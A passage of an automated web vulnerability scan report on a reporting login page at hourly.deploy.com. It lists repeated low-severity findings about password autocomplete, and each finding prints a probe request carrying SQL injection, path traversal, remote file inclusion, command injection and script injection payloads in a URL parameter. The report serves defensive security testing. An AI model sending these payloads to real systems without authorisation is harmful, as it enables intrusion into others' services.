<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.242. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.243. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.244. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.245. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=SELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.246. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.247. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/index.cfm?nsextt=%3Cscript%3Ens(0x000024)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%3cscript%3ens(0x000024)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.248. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=NSFTW HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=NSFTW" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.249. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1%20ns=netsparker(0x000026)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%20ns=netsparker(0x000026)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.250. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.251. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.252. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x00002F)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x00002F)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.253. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.254. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=http://netsparker.com/n? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.255. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.256. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='%2BNSFTW%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2BNSFTW%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.257. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1+OR+X%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1+OR+X%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.258. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.259. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
